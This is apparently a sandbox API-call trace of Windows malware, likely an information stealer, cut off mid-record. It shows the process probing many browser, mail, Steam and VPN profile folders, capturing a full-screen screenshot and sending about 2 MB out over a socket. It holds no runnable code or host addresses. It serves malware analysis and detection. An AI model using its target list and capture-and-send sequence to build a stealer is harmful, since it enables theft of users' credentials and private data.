GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x46 [0189.785] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.787] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.787] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data") returned 0x3a [0189.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.787] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x39 [0189.787] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.790] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.790] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience") returned 0x4e [0189.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.790] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpFilePart=0x0) returned 0x4d [0189.791] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.794] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.794] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Steam", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam") returned 0x27 [0189.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.794] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", lpFilePart=0x0) returned 0x26 [0189.794] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.796] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.796] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data") returned 0x3d [0189.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.797] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", lpFilePart=0x0) returned 0x3c [0189.797] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.923] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.924] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Mozilla\\Firefox", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x33 [0189.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f204) returned 1 [0189.924] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x36ece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x32 [0189.925] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x36efb4 | out: lpFindFileData=0x36efb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef74) returned 1 [0189.927] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.927] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Waterfox", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox") returned 0x2c [0189.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f204) returned 1 [0189.927] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox", nBufferLength=0x105, lpBuffer=0x36ece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox", lpFilePart=0x0) returned 0x2b [0189.928] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox\\*", lpFindFileData=0x36efb4 | out: lpFindFileData=0x36efb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef74) returned 1 [0189.929] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.929] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\K-Meleon", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon") returned 0x2c [0189.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f204) returned 1 [0189.930] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon", nBufferLength=0x105, lpBuffer=0x36ece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon", lpFilePart=0x0) returned 0x2b [0189.930] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon\\*", lpFindFileData=0x36efb4 | out: lpFindFileData=0x36efb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef74) returned 1 [0189.932] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.932] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Thunderbird", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird") returned 0x2f [0189.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f204) returned 1 [0189.932] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird", nBufferLength=0x105, lpBuffer=0x36ece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird", lpFilePart=0x0) returned 0x2e [0189.932] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird\\*", lpFindFileData=0x36efb4 | out: lpFindFileData=0x36efb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef74) returned 1 [0189.934] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.934] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Comodo\\IceDragon", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon") returned 0x34 [0189.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f204) returned 1 [0189.934] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon", nBufferLength=0x105, lpBuffer=0x36ece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon", lpFilePart=0x0) returned 0x33 [0189.934] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon\\*", lpFindFileData=0x36efb4 | out: lpFindFileData=0x36efb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef74) returned 1 [0189.936] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.936] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\8pecxstudios\\Cyberfox", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox") returned 0x39 [0189.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f204) returned 1 [0189.937] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox", nBufferLength=0x105, lpBuffer=0x36ece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox", lpFilePart=0x0) returned 0x38 [0189.937] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\*", lpFindFileData=0x36efb4 | out: lpFindFileData=0x36efb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef74) returned 1 [0189.987] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.987] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw") returned 0x41 [0189.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f204) returned 1 [0189.987] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", nBufferLength=0x105, lpBuffer=0x36ece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", lpFilePart=0x0) returned 0x40 [0189.987] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\*", lpFindFileData=0x36efb4 | out: lpFindFileData=0x36efb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef74) returned 1 [0189.989] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.989] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon") returned 0x43 [0189.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f204) returned 1 [0189.990] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", nBufferLength=0x105, lpBuffer=0x36ece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", lpFilePart=0x0) returned 0x42 [0189.990] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\*", lpFindFileData=0x36efb4 | out: lpFindFileData=0x36efb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef74) returned 1 [0189.997] CoCreateGuid (in: pguid=0x36efb8 | out: pguid=0x36efb8*(Data1=0xff5b5b86, Data2=0x8c25, Data3=0x4b56, Data4=([0]=0xa1, [1]=0x1c, [2]=0x2d, [3]=0x98, [4]=0x7b, [5]=0xa5, [6]=0xa6, [7]=0xc8))) returned 0x0 [0189.997] CoCreateGuid (in: pguid=0x36eefc | out: pguid=0x36eefc*(Data1=0x2b443265, Data2=0x14d9, Data3=0x496d, Data4=([0]=0xb2, [1]=0x4, [2]=0x32, [3]=0x94, [4]=0x67, [5]=0xed, [6]=0xd1, [7]=0x77))) returned 0x0 [0189.998] send (s=0x264, buf=0x2512fe3*, len=171, flags=0) returned 171 [0189.999] recv (in: s=0x264, buf=0x241e714, len=8192, flags=0 | out: buf=0x241e714*) returned 128 [0190.199] GdipCreateFromHWND (hwnd=0x0, graphics=0x36f274) returned 0x0 [0190.200] GdipGetDC (graphics=0x9d2230, hdc=0x36f284) returned 0x0 [0190.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gdi32", cchWideChar=5, lpMultiByteStr=0x36f224, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gdi32E\x1f", lpUsedDefaultChar=0x0) returned 5 [0190.201] LoadLibraryA (lpLibFileName="gdi32") returned 0x77240000 [0190.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDeviceCaps", cchWideChar=13, lpMultiByteStr=0x36f21c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceCapsF\x1f", lpUsedDefaultChar=0x0) returned 13 [0190.202] GetProcAddress (hModule=0x77240000, lpProcName="GetDeviceCaps") returned 0x77254de0 [0190.202] GetDeviceCaps (hdc=0x1401027a, index=10) returned 900 [0190.202] GetDeviceCaps (hdc=0x1401027a, index=117) returned 900 [0190.202] GdipReleaseDC (graphics=0x9d2230, hdc=0x1401027a) returned 0x0 [0190.202] GdipDeleteGraphics (graphics=0x9d2230) returned 0x0 [0190.671] GdipCreateBitmapFromScan0 (width=1440, height=900, stride=0, format=0x26200a, scan0=0x0, bitmap=0x36f264) returned 0x0 [0190.749] GdipGetImagePixelFormat (image=0x9d2230, format=0x36f2e4) returned 0x0 [0190.749] GdipGetImageGraphicsContext (image=0x9d2230, graphics=0x36f2f0) returned 0x0 [0190.845] GdipSetInterpolationMode (graphics=0x9d2730, interpolationMode=0x4) returned 0x0 [0190.882] GdipSetPixelOffsetMode (graphics=0x9d2730, pixelOffsetMode=0x1) returned 0x0 [0190.882] GdipSetSmoothingMode (graphics=0x9d2730, smoothingMode=0x1) returned 0x0 [0191.228] GetDC (hWnd=0x0) returned 0x2010a42 [0191.233] GetCurrentObject (hdc=0x2010a42, type=0x1) returned 0x1b00017 [0191.233] GetCurrentObject (hdc=0x2010a42, type=0x2) returned 0x1900010 [0191.233] GetCurrentObject (hdc=0x2010a42, type=0x7) returned 0x1050032 [0191.234] GetCurrentObject (hdc=0x2010a42, type=0x6) returned 0x18a002e [0191.234] GdipGetDC (graphics=0x9d2730, hdc=0x36f1e4) returned 0x0 [0191.343] BitBlt (hdc=0x130101ea, x=0, y=0, cx=1440, cy=900, hdcSrc=0x2010a42, x1=0, y1=0, rop=0xcc0020) returned 1 [0191.358] GdipReleaseDC (graphics=0x9d2730, hdc=0x130101ea) returned 0x0 [0191.417] ReleaseDC (hWnd=0x0, hDC=0x2010a42) returned 1 [0191.417] GdipDeleteGraphics (graphics=0x9d2730) returned 0x0 [0191.466] GdipGetImageEncodersSize (numEncoders=0x36f26c, size=0x36f268) returned 0x0 [0191.466] LocalAlloc (uFlags=0x0, uBytes=0x410) returned 0x78cc18 [0191.467] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x78cc18 | out: encoders=0x78cc18) returned 0x0 [0191.472] LocalFree (hMem=0x78cc18) returned 0x0 [0191.486] GdipSaveImageToStream (image=0x9d2230, stream=0x3f0030, clsidEncoder=0x36f27c*(Data1=0x557cf406, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0193.632] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0x938420d0, Data2=0x7ea2, Data3=0x4ff0, Data4=([0]=0xac, [1]=0x2f, [2]=0x20, [3]=0xdf, [4]=0x84, [5]=0xbc, [6]=0x21, [7]=0x9b))) returned 0x0 [0193.632] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0xb2b2bc74, Data2=0x2dd8, Data3=0x442f, Data4=([0]=0x89, [1]=0x39, [2]=0x6a, [3]=0x47, [4]=0x1f, [5]=0xe7, [6]=0x2e, [7]=0xe4))) returned 0x0 [0193.919] send (s=0x264, buf=0x3f115c5*, len=65536, flags=0) returned 65536 [0193.921] send (s=0x264, buf=0x3f215c5*, len=65536, flags=0) returned 65536 [0194.467] send (s=0x264, buf=0x3f315c5*, len=65536, flags=0) returned 65536 [0194.673] send (s=0x264, buf=0x3f415c5*, len=65536, flags=0) returned 65536 [0194.732] send (s=0x264, buf=0x3f515c5*, len=65536, flags=0) returned 65536 [0194.795] send (s=0x264, buf=0x3f615c5*, len=65536, flags=0) returned 65536 [0194.923] send (s=0x264, buf=0x3f715c5*, len=65536, flags=0) returned 65536 [0195.018] send (s=0x264, buf=0x3f815c5*, len=65536, flags=0) returned 65536 [0195.149] send (s=0x264, buf=0x3f915c5*, len=65536, flags=0) returned 65536 [0195.299] send (s=0x264, buf=0x3fa15c5*, len=65536, flags=0) returned 65536 [0195.508] send (s=0x264, buf=0x3fb15c5*, len=65536, flags=0) returned 65536 [0195.713] send (s=0x264, buf=0x3fc15c5*, len=65536, flags=0) returned 65536 [0195.821] send (s=0x264, buf=0x3fd15c5*, len=65536, flags=0) returned 65536 [0196.023] send (s=0x264, buf=0x3fe15c5*, len=65536, flags=0) returned 65536 [0196.211] send (s=0x264, buf=0x3ff15c5*, len=65536, flags=0) returned 65536 [0196.430] send (s=0x264, buf=0x40015c5*, len=65536, flags=0) returned 65536 [0196.538] send (s=0x264, buf=0x40115c5*, len=65536, flags=0) returned 65536 [0196.757] send (s=0x264, buf=0x40215c5*, len=65536, flags=0) returned 65536 [0196.977] send (s=0x264, buf=0x40315c5*, len=65536, flags=0) returned 65536 [0197.179] send (s=0x264, buf=0x40415c5*, len=65536, flags=0) returned 65536 [0197.234] send (s=0x264, buf=0x40515c5*, len=65536, flags=0) returned 65536 [0197.444] send (s=0x264, buf=0x40615c5*, len=65536, flags=0) returned 65536 [0197.574] send (s=0x264, buf=0x40715c5*, len=65536, flags=0) returned 65536 [0197.789] send (s=0x264, buf=0x40815c5*, len=65536, flags=0) returned 65536 [0198.007] send (s=0x264, buf=0x40915c5*, len=65536, flags=0) returned 65536 [0198.062] send (s=0x264, buf=0x40a15c5*, len=65536, flags=0) returned 65536 [0198.273] send (s=0x264, buf=0x40b15c5*, len=65536, flags=0) returned 65536 [0198.327] send (s=0x264, buf=0x40c15c5*, len=65536, flags=0) returned 65536 [0198.560] send (s=0x264, buf=0x40d15c5*, len=65536, flags=0) returned 65536 [0198.772] send (s=0x264, buf=0x40e15c5*, len=65536, flags=0) returned 65536 [0198.825] send (s=0x264, buf=0x40f15c5*, len=65536, flags=0) returned 65536 [0199.038] send (s=0x264, buf=0x41015c5*, len=65536, flags=0) returned 65536 [0199.090] send (s=0x264, buf=0x41115c5*, len=65536, flags=0) returned 65536 [0199.304] send (s=0x264, buf=0x41215c5*, len=65536, flags=0) returned 65536 [0199.357] send (s=0x264, buf=0x41315c5*, len=28937, flags=0) returned 28937 [0199.475] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 125 [0199.944] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f18c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0199.945] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local", lpDst=0x36f18c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x21 [0199.945] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NordVPN", nBufferLength=0x105, lpBuffer=0x36edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\NordVPN", lpFilePart=0x0) returned 0x28 [0199.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f024) returned 1 [0199.945] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NordVPN" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\nordvpn"), fInfoLevelId=0x0, lpFileInformation=0x24442b8 | out: lpFileInformation=0x24442b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, 